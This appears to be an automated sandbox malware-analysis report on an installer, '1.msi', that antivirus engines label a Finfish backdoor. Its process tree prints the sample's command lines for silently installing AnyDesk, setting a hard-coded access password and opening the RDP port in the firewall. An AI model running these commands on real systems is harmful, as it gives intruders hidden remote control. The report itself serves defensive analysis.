Edit tour
Windows
Analysis Report
1.msi
Overview
General Information
| Sample Name: | 1.msi |
| Analysis ID: | 679413 |
| MD5: | 6cf5ad7a7d1b7bab0c62e246cf41a985 |
| SHA1: | b06a03adc550ead96534f5e723395c4e16bfdf44 |
| SHA256: | fb9f0bf2b71bf576053c56cb913ea4e93581fc9d3aa9d6d8a0ae572a1622f050 |
| Tags: | msi |
| Infos: | |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses netsh to modify the Windows network and firewall settings
Hides user accounts
Creates an undocumented autostart registry key
Hides that the sample has been downloaded from the Internet (zone.identifier)
Modifies the windows firewall
Tries to disable installed Antivirus / HIPS / PFW
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Sleep loop found (likely to delay execution)
Detected potential crypto function
Changes image file execution options
Contains functionality to dynamically determine API calls
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Spawns drivers
Checks for available system drives (often done to infect USB drives)
Creates or modifies windows services
Dropped file seen in connection with other malware
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Classification
- System is w7x64
msiexec.exe (PID: 2996 cmdline: "C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\Desktop\ 1.msi" MD5: AC2E7152124CEED36846BD1B6592A00F)
- msiexec.exe (PID: 1184 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: AC2E7152124CEED36846BD1B6592A00F) - msiexec.exe (PID: 2876 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 6381DE7 DB6BAADD41 D0E24C26E5 9EDFC MD5: 4315D6ECAE85024A0567DF2CB253B7B0) 
cmd.exe (PID: 2332 cmdline: C:\Windows \system32\ cmd.exe /c rd /s /q "C:\Users\ user\AppDa ta\Local\T emp\MW-4a7 54448-1372 -4b62-af77 -6f1650246 a5a\files" MD5: AD7B9C14083B52BC532FBA5948342B98) - msiexec.exe (PID: 1704 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 22388C5 15E15FC158 EA4B11229C 0F8D9 E Gl obal\MSI00 00 MD5: 4315D6ECAE85024A0567DF2CB253B7B0) 
icacls.exe (PID: 1820 cmdline: "C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 4a754448-1 372-4b62-a f77-6f1650 246a5a\." /SETINTEGR ITYLEVEL ( CI)(OI)HIG H MD5: 1542A92D5C6F7E1E80613F3466C9CE7F) - expand.exe (PID: 672 cmdline:
"C:\Window s\system32 \EXPAND.EX E" -R file s.cab -F:* files MD5: 659CED6D7BDA047BCC6048384231DB9F) - install.exe (PID: 2440 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\MW-4a7 54448-1372 -4b62-af77 -6f1650246 a5a\files\ install.ex e" MD5: 8C42AB81F90EE0592F7A709F0F7E320B) - cmd.exe (PID: 1404 cmdline:
cmd /c c:\ programdat a\anydesk. exe --inst all C:\Pro gramData\A nyDesk --s ilent MD5: AD7B9C14083B52BC532FBA5948342B98) 
anydesk.exe (PID: 2640 cmdline: c:\program data\anyde sk.exe --i nstall C:\ ProgramDat a\AnyDesk --silent MD5: 1BC5890C9E7BF54B7712E344B0AF9D04) - cmd.exe (PID: 2544 cmdline:
cmd /c ech o 31121985 west|c:\pr ogramdata\ anydesk\an ydesk.exe --set-pass word MD5: AD7B9C14083B52BC532FBA5948342B98) - cmd.exe (PID: 2548 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho 3112198 5west" MD5: AD7B9C14083B52BC532FBA5948342B98) - AnyDesk.exe (PID: 2856 cmdline:
c:\program data\anyde sk\anydesk .exe --set -password MD5: 1BC5890C9E7BF54B7712E344B0AF9D04) - AnyDesk.exe (PID: 2120 cmdline:
"c:\progra mdata\anyd esk\anydes k.exe" --g et-id MD5: 1BC5890C9E7BF54B7712E344B0AF9D04) - netsh.exe (PID: 2744 cmdline:
netsh advf irewall fi rewall add rule name ="RDP" dir =in protoc ol=TCP loc alport=338 9 action=a llow MD5: 784A50A6A09C25F011C3143DDD68E729) - icacls.exe (PID: 1004 cmdline:
"C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 4a754448-1 372-4b62-a f77-6f1650 246a5a\." /SETINTEGR ITYLEVEL ( CI)(OI)LOW MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
- VSSVC.exe (PID: 1232 cmdline:
C:\Windows \system32\ vssvc.exe MD5: B60BA0BC31B0CB414593E169F6F21CC2)
- svchost.exe (PID: 2224 cmdline:
C:\Windows \System32\ svchost.ex e -k swprv MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
- rdpdr.sys (PID: 4 cmdline:
MD5: 1B6163C503398B23FF8B939C67747683)
- tdtcp.sys (PID: 4 cmdline:
MD5: 51C5ECEB1CDEE2468A1748BE550CFBC8)
- tssecsrv.sys (PID: 4 cmdline:
MD5: 19BEDA57F3E0A06B8D5EB6D619BD5624)
- rdpwd.sys (PID: 4 cmdline:
MD5: FE571E088C2D83619D2D48D4E961BF41)
- AnyDesk.exe (PID: 2556 cmdline:
"C:\Progra mData\AnyD esk\AnyDes k.exe" --s ervice MD5: 1BC5890C9E7BF54B7712E344B0AF9D04)
- AnyDesk.exe (PID: 2336 cmdline:
"C:\Progra mData\AnyD esk\AnyDes k.exe" --c ontrol MD5: 1BC5890C9E7BF54B7712E344B0AF9D04)
- cleanup
⊘No configs have been found
⊘No yara matches
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Virustotal: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Virustotal: | Perma Link | ||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | IP Address: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | DNS traffic detected: | ||
| Source: | Code function: | 11_2_004013DD | |
| Source: | Binary or memory string: | ||
| Source: | File deleted: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Code function: | 16_2_01042DFD | |
| Source: | Code function: | 20_2_012A2DFD | |
| Source: | Static PE information: | ||
| Source: | Process Stats: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Driver loaded: | ||
| Source: | Dropped File: | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | |||
| Source: | Memory allocated: | |||
| Source: | Virustotal: | ||
| Source: | ReversingLabs: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Console Write: | Jump to behavior | ||
| Source: | Console Write: | Jump to behavior | ||
| Source: | Console Write: | |||
| Source: | Console Write: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Code function: | 11_2_00401C0B | |
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Classification label: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Code function: | 11_2_00401254 | |
| Source: | File written: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Window detected: | ||
| Source: | Static file information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
Data Obfuscation | |
|---|
| Source: | Unpacked PE file: | ||
| Source: | Unpacked PE file: | ||
| Source: | Unpacked PE file: | ||
| Source: | Unpacked PE file: | ||
| Source: | Unpacked PE file: | ||
| Source: | Code function: | 16_2_015A9818 | |
| Source: | Code function: | 20_2_01809818 | |
| Source: | Code function: | 20_2_01809818 | |
| Source: | Code function: | 20_2_01817257 | |
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
Boot Survival | |
|---|
| Source: | Key value created or modified: | Jump to behavior | ||
| Source: | Key value created or modified: | Jump to behavior | ||
| Source: | Key value created or modified: | Jump to behavior | ||
| Source: | Key value created or modified: | Jump to behavior | ||
| Source: | Key value created or modified: | Jump to behavior | ||
| Source: | Registry key value modified: | Jump to behavior | ||
| Source: | Registry key created: | Jump to behavior | ||
Hooking and other Techniques for Hiding and Protection | |
|---|
| Source: | Registry value created: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Process created: | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | |||
| Source: | Process information set: | |||
| Source: | Process information set: | |||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | |||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | File opened / queried: | Jump to behavior | ||
| Source: | Process information queried: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | File Volume queried: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Code function: | 16_2_015B0229 | |
| Source: | Code function: | 20_2_01817257 | |
| Source: | Memory protected: | Jump to behavior | ||
| Source: | Code function: | 16_2_015B0229 | |
| Source: | Code function: | 20_2_01810229 | |
| Source: | Code function: | 20_2_01810229 | |
| Source: | Code function: | 20_2_0180743D | |
| Source: | Code function: | 20_2_0180743D | |
| Source: | File opened: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Code function: | 20_2_016F9BE0 | |
Lowering of HIPS / PFW / Operating System Security Settings | |
|---|
| Source: | Process created: | ||
| Source: | Process created: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1 Replication Through Removable Media | 1 Native API | 1 LSASS Driver | 1 LSASS Driver | 211 Disable or Modify Tools | 1 Input Capture | 1 System Time Discovery | 1 Replication Through Removable Media | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 1 Command and Scripting Interpreter | 1 Image File Execution Options Injection | 1 Image File Execution Options Injection | 1 Obfuscated Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 12 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | 2 Windows Service | 1 Access Token Manipulation | 11 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | 1 Registry Run Keys / Startup Folder | 2 Windows Service | 1 File Deletion | NTDS | 14 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Cron | 1 Services File Permissions Weakness | 11 Process Injection | 21 Masquerading | LSA Secrets | 131 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | 2 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
| Replication Through Removable Media | Launchd | Rc.common | 1 Registry Run Keys / Startup Folder | 41 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | 1 Services File Permissions Weakness | 1 Access Token Manipulation | DCSync | 41 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Hidden Users | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
| Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | 1 Services File Permissions Weakness | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 48% | Virustotal | Browse | ||
| 30% | ReversingLabs | Win32.Backdoor.Finfish | ||
| 100% | Avira | BDS/Finfish.ujrxw |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 100% | Avira | BDS/Finfish.ujrxw | ||
| 100% | Avira | BDS/Finfish.ujrxw | ||
| 100% | Avira | TR/Dropper.Gen | ||
| 100% | Joe Sandbox ML | |||
| 0% | Virustotal | Browse | ||
| 3% | Metadefender | Browse | ||
| 2% | ReversingLabs | |||
| 64% | Virustotal | Browse | ||
| 22% | Metadefender | Browse | ||
| 65% | ReversingLabs | Win32.Backdoor.Finfish | ||
| 64% | Virustotal | Browse | ||
| 22% | Metadefender | Browse | ||
| 65% | ReversingLabs | Win32.Backdoor.Finfish | ||
| 0% | Virustotal | Browse | ||
| 0% | Metadefender | Browse | ||
| 0% | ReversingLabs | |||
| 0% | Virustotal | Browse | ||
| 0% | Metadefender | Browse | ||
| 0% | ReversingLabs | |||
| 0% | Metadefender | Browse | ||
| 0% | ReversingLabs | |||
| 0% | Metadefender | Browse | ||
| 0% | ReversingLabs |
| Source | Detection | Scanner | Label | Link | Download |
|---|---|---|---|---|---|
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File |
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| boot.net.anydesk.com | 92.223.88.41 | true | false | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
